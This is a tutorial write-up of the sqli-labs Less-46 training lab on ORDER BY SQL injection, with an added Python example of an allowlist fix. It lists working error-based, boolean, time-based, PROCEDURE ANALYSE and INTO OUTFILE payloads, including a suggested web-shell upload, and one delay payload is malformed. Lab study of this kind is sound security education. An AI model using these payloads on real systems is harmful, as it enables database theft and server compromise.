Sqli-labs less 46

Source: Internet
Author: User

Less-46

Starting with this level, we begin to learn about ORDER BY related injections.

The SQL statement for this level is $sql = "SELECT * FROM users ORDER BY $id";

Try ?sort=1 DESC and ?sort=1 ASC: they show different results (descending versus ascending order), which indicates that the parameter can be injected.

From the SQL statement above, we can see that our injection point is in the argument after ORDER BY. An ORDER BY injection point differs from one in a WHERE clause: we cannot inject with UNION. To see how to inject into ORDER BY, let's first look at the documentation for MySQL's SELECT statement.
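The ORDER BY sink described above, together with its fix, as an added example that is not part of sqli-labs or this write-up: the vulnerable function concatenates the sort parameter into ORDER BY, so 1 ASC and 1 DESC reorder the result (the oracle used in this level), while the hardened version maps the parameter onto an allowlisted column and direction, because ORDER BY identifiers cannot be bound as query placeholders. SQLite stands in for MySQL, and the users table and its rows are constructed for the example.

```python
import sqlite3

# Constructed sample rows standing in for sqli-labs' users table (assumption).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]


def _connect():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_query(sort):
    """Mirrors Less-46: the sort parameter is concatenated into ORDER BY, so any
    expression the client sends is evaluated by the database."""
    sql = f"SELECT id FROM users ORDER BY {sort}"
    return [row[0] for row in _connect().execute(sql)]


# Allowlist: client-supplied keys map to server-controlled identifiers.
SORT_COLUMNS = {"1": "id", "2": "username", "id": "id", "username": "username"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def is_allowed_sort(sort, direction):
    """True only when both values are exact allowlist keys (case-insensitive).
    Anything else, e.g. '1 DESC' or 'rand(...)', is rejected and can be logged."""
    return sort.lower() in SORT_COLUMNS and direction.lower() in SORT_DIRECTIONS


def safe_query(sort="id", direction="asc"):
    """Hardened form: ORDER BY identifiers cannot be bound as placeholders,
    so the query only ever contains strings chosen from the allowlist."""
    if not is_allowed_sort(sort, direction):
        raise ValueError("unsupported sort parameter")
    column = SORT_COLUMNS[sort.lower()]
    order = SORT_DIRECTIONS[direction.lower()]
    sql = f"SELECT id FROM users ORDER BY {column} {order}"
    return [row[0] for row in _connect().execute(sql)]


if __name__ == "__main__":
    print(vulnerable_query("1 ASC"), vulnerable_query("1 DESC"))  # [1, 2, 3] [3, 2, 1]
    print(safe_query("username", "asc"))  # [2, 1, 3]
    print(is_allowed_sort("rand(1)", "asc"))  # False
```

Rejected sort values are worth logging: a sort parameter that is not a plain allowlist key is the simplest detection signal for probing of this kind.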

We can inject through some of the parameters that may follow ORDER BY.

First, the number after ORDER BY can be used as an injection point. That is, we construct an expression after ORDER BY whose result is a number. Let's try:

http://127.0.0.1/sqli-labs/Less-46/?sort=right(version(),1)

No error, but right() and left() give the same result, which shows that a numeric result does not help here, so we consider the Boolean type instead. At this point we can use error-based injection and delay (time-based) injection.

Here we can directly construct a parameter following sort=. There are three forms:

① Add the injection statement directly: sort=(select ******)

② Use a function such as rand(): sort=rand(SQL statement)

PS: Here we can show that rand(true) and rand(false) give different results.

③ Use AND, for example sort=1 and (SQL statement).

At the same time, the injected SQL statement can use either the error-based or the delay-based method; we can construct the statement flexibly.

Error injection example

http://127.0.0.1/sqli-labs/Less-46/?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand())))

In the example above, you can see the user name in the error message.

Next we'll use rand() for a demonstration, because, as mentioned above, rand(true) and rand(false) give different results.

http://127.0.0.1/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=115)

http://127.0.0.1/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=116)

From the results of the two screenshots above, comparing the rand(true) and rand(false) results, it can be seen that the injection succeeds.

Delay injection example

http://127.0.0.1/sqli-labs/Less-46/?sort=(select if(substring(current,1,1)=char(),benchmark(50000000,md5('1')),null) from (select database() as current) as tb1)

http://127.0.0.1/sqllib/Less-46/?sort=1 and if(ascii(substr()(database())=116,0,sleep(5))

The two delay injection examples above show an obvious difference in response time. No screenshot is given here, since a picture cannot show the delay.

You can also append injection statements after sort=1 and. This is not demonstrated here.

    1. Injection via the PROCEDURE ANALYSE parameter

      Using the PROCEDURE ANALYSE parameter, we can perform error-based injection. Also, a LIMIT clause can sit between ORDER BY and PROCEDURE ANALYSE, so in practice a LIMIT injection point can likewise be exploited through PROCEDURE ANALYSE.

      The following is an example:

      http://127.0.0.1/sqli-labs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

    2. Writing query results to a file with INTO OUTFILE

      http://127.0.0.1/sqllib/less-46/?sort=1 into outfile "c:\\wamp\\www\\sqllib\\test1.txt"

      This writes the query results into a file.

      At this point one could consider uploading a web shell using LINES TERMINATED BY:

      into outfile c:\\wamp\\www\\sqllib\\test1.txt lines terminated by 0x(web shell converted to hexadecimal)
